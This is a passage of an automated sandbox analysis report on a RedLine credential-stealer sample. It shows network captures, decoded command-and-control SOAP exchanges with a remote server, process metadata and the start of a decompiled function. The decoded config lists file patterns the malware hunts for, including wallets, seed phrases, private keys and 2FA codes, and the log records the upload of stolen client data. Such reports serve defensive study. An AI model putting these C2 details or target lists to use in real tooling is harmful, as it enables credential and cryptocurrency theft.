Feb 23, 2021 17:48:18.137546062 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137572050 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137650967 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137677908 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137703896 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137729883 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.137975931 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138397932 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138437986 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138462067 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138497114 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138526917 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138555050 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138582945 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138609886 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138636112 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138664007 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138690948 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138729095 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138761044 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138787031 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138813972 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138839960 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138864994 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138902903 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138931036 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138956070 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.138982058 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139008045 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139045000 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139075994 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139102936 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139127970 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139154911 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139178991 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139204979 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139230013 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139265060 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139297009 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139322042 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139475107 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139503002 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139527082 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139552116 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139576912 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139612913 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139643908 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.139986038 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.140014887 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.140041113 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.140065908 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.140091896 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.446821928 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.499093056 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.946862936 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.999455929 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:18.999560118 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:18.999927998 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:19.052963018 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:19.052995920 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:19.053067923 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:19.105418921 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:19.115498066 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:19.243750095 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:19.295237064 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:19.295787096 CET	49726	3214	192.168.2.3	45.14.13.58

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 17:47:41.914413929 CET	53	51281	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:43.070313931 CET	49199	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:43.130310059 CET	53	49199	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:43.204674006 CET	50620	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:43.268255949 CET	53	50620	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:44.293438911 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:44.345494032 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:45.478890896 CET	60152	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:45.530488014 CET	53	60152	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:46.719755888 CET	57544	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:46.768342018 CET	53	57544	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:48.040963888 CET	55984	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:48.101161957 CET	53	55984	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:49.112417936 CET	64185	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:49.161303043 CET	53	64185	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:50.631541967 CET	65110	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:50.683087111 CET	53	65110	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:51.948381901 CET	58361	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:51.997004032 CET	53	58361	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:52.812817097 CET	63492	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:52.862421989 CET	53	63492	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:54.186367989 CET	60831	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:54.235014915 CET	53	60831	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:55.011780977 CET	60100	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:55.061762094 CET	53	60100	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:56.018990993 CET	53195	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:56.071214914 CET	53	53195	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:56.850816011 CET	50141	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:56.902328968 CET	53	50141	8.8.8.8	192.168.2.3
Feb 23, 2021 17:47:57.942689896 CET	53023	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:47:57.991410017 CET	53	53023	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:09.434297085 CET	49563	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:09.485801935 CET	53	49563	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:10.333668947 CET	51352	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:10.381227016 CET	59349	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:10.385305882 CET	53	51352	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:10.396611929 CET	57084	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:10.429810047 CET	53	59349	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:10.457633972 CET	53	57084	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:11.357084036 CET	58823	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:11.405728102 CET	53	58823	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:12.226628065 CET	57568	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:12.438410044 CET	53	57568	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:17.397584915 CET	50540	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:17.455924988 CET	53	50540	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:19.497724056 CET	54366	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:19.547638893 CET	53	54366	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:37.766927004 CET	53034	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:37.825889111 CET	53	53034	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:45.378946066 CET	57762	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:45.441298962 CET	53	57762	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:46.347553968 CET	55435	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:46.407594919 CET	53	55435	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:46.972224951 CET	50713	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:47.030848026 CET	56132	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:47.049971104 CET	53	50713	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:47.090862036 CET	53	56132	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:47.543883085 CET	58987	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:47.609217882 CET	53	58987	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:48.130502939 CET	56579	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:48.182009935 CET	53	56579	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:48.789802074 CET	60633	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:48.865509033 CET	53	60633	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:49.505683899 CET	61292	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:49.578013897 CET	53	61292	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:50.520776987 CET	63619	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:50.577980042 CET	53	63619	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:51.601552963 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:51.661313057 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 17:48:52.215003967 CET	61946	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:48:52.274837971 CET	53	61946	8.8.8.8	192.168.2.3
Feb 23, 2021 17:49:03.993792057 CET	64910	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:49:04.057089090 CET	53	64910	8.8.8.8	192.168.2.3
Feb 23, 2021 17:49:29.278896093 CET	52123	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:49:29.327621937 CET	53	52123	8.8.8.8	192.168.2.3
Feb 23, 2021 17:49:30.800318956 CET	56130	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:49:30.859863997 CET	53	56130	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 17:48:10.333668947 CET	192.168.2.3	8.8.8.8	0xa13a	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Feb 23, 2021 17:48:10.396611929 CET	192.168.2.3	8.8.8.8	0x62be	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Feb 23, 2021 17:48:12.226628065 CET	192.168.2.3	8.8.8.8	0x2b70	Standard query (0)	whois.iana.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 17:48:10.385305882 CET	8.8.8.8	192.168.2.3	0xa13a	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 17:48:10.457633972 CET	8.8.8.8	192.168.2.3	0x62be	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 17:48:12.438410044 CET	8.8.8.8	192.168.2.3	0x2b70	No error (0)	whois.iana.org	ianawhois.vip.icann.org		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 17:48:12.438410044 CET	8.8.8.8	192.168.2.3	0x2b70	No error (0)	ianawhois.vip.icann.org		192.0.47.59	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

45.14.13.58:3214

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49718	45.14.13.58	3214	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:48:08.775664091 CET	1303	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings" Host: 45.14.13.58:3214 Content-Length: 136 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Feb 23, 2021 17:48:08.829349041 CET	1303	IN	HTTP/1.1 100 Continue
Feb 23, 2021 17:48:08.885245085 CET	1305	IN	HTTP/1.1 200 OK Content-Length: 3543 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 23 Feb 2021 16:48:07 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 4d 79 4e 61 6d 65 73 70 61 63 65 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 4f 62 6a 65 63 74 31 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 31 3e 3c 61 3a 4f 62 6a 65 63 74 31 30 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 31 30 3e 3c 61 3a 4f 62 6a 65 63 74 31 31 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 6f 63 75 6d 65 6e 74 73 7c 2a 2e 74 78 74 2c 2a 2e 64 6f 63 2a 2c 2a 6b 65 79 2a 2c 2a 77 61 6c 6c 65 74 2a 2c 2a 73 65 65 64 2a 2c 2a 63 6f 69 6e 2a 2c 2a 6d 79 65 74 68 65 72 2a 2c 2a 65 78 6f 64 75 73 2a 2c 2a 6a 61 78 78 2a 2c 2a 62 69 6e 61 6e 63 65 2a 2c 2a 32 66 61 20 63 6f 64 65 2a 2c 2a 70 72 69 76 61 74 65 20 6b 65 79 2a 7c 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 6f 63 75 6d 65 6e 74 73 7c 2a 2e 74 78 74 2c 2a 2e 64 6f 63 2a 2c 2a 6b 65 79 2a 2c 2a 77 61 6c 6c 65 74 2a 2c 2a 73 65 65 64 2a 2c 2a 63 6f 69 6e 2a 2c 2a 6d 79 65 74 68 65 72 2a 2c 2a 65 78 6f 64 75 73 2a 2c 2a 6a 61 78 78 2a 2c 2a 62 69 6e 61 6e 63 65 2a 2c 2a 32 66 61 20 63 6f 64 65 2a 2c 2a 70 72 69 76 61 74 65 20 6b 65 79 2a 7c 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 2f 61 3a 4f 62 6a 65 63 74 31 31 3e 3c 61 3a 4f 62 6a 65 63 74 31 32 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 31 33 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 35 2e 31 30 32 2e 33 38 2e 31 35 38 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 34 36 2e 32 31 39 2e 32 30 36 2e 31 35 36 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 36 31 2e 32 33 30 2e 39 30 2e 31 35 35 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 30 39 2e 31 37 35 2e 39 37 2e 31 30 33 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 32 2e 31 38 30 2e 31 37 31 2e 31 31 31 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 39 33 2e 31 32 38 2e 31 30 38 2e 32 35 31 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 38 34 2e 31 37 2e 36 31 2e 38 33 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 32 2e 38 36 2e 36 36 2e 31 39 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 35 31 2e 31 30 34 2e 31 36 34 2e 31 30 30 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 38 35 2e 32 31 32 2e 31 37 31 2e 31 35 32 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 39 35 2e 32 33 30 2e 31 34 2e 31 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetSettingsResponse xmlns="http://tempuri.org/"><GetSettingsResult xmlns:a="MyNamespace" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:Object1>true</a:Object1><a:Object10>false</a:Object10><a:Object11 xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%userprofile%\Documents\|.txt,.doc,key,wallet,seed,coin,myether,exodus,jaxx,binance,2fa code,private key\|0</b:string><b:string>%userprofile%\Documents\|.txt,.doc,key,wallet,seed,coin,myether,exodus,jaxx,binance,2fa code,private key\|0</b:string></a:Object11><a:Object12 xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object13 xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>5.102.38.158</b:string><b:string>46.219.206.156</b:string><b:string>161.230.90.155</b:string><b:string>109.175.97.103</b:string><b:string>182.180.171.111</b:string><b:string>193.128.108.251</b:string><b:string>84.17.61.83</b:string><b:string>2.86.66.190</b:string><b:string>51.104.164.100</b:string><b:string>185.212.171.152</b:string><b:string>195.230.14.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49726	45.14.13.58	3214	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:48:16.793100119 CET	1354	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo" Host: 45.14.13.58:3214 Content-Length: 1109278 Expect: 100-continue Accept-Encoding: gzip, deflate
Feb 23, 2021 17:48:16.846759081 CET	1354	IN	HTTP/1.1 100 Continue
Feb 23, 2021 17:48:17.541506052 CET	2461	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 23 Feb 2021 16:48:16 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 6e 64 43 6c 69 65 6e 74 49 6e 66 6f 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SendClientInfoResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49728	45.14.13.58	3214	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 17:48:17.602638960 CET	2467	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks" Host: 45.14.13.58:3214 Content-Length: 1083264 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Feb 23, 2021 17:48:17.655700922 CET	2468	IN	HTTP/1.1 100 Continue
Feb 23, 2021 17:48:19.115498066 CET	3676	IN	HTTP/1.1 200 OK Content-Length: 250 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 23 Feb 2021 16:48:17 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 54 61 73 6b 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 54 61 73 6b 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 4d 79 4e 61 6d 65 73 70 61 63 65 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 54 61 73 6b 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetTasksResponse xmlns="http://tempuri.org/"><GetTasksResult xmlns:a="MyNamespace" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetTasksResponse></s:Body></s:Envelope>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472 Parent PID: 5572

General

Start time:	17:47:49
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe'
Imagebase:	0x400000
File size:	219136 bytes
MD5 hash:	A6602F490E70A0C9846906944C01B1BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.270171901.0000000002363000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.270134267.0000000002310000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe PID: 6472 Parent PID: 5572 SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCOMMON

Executed Functions

Function 004019F0, Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
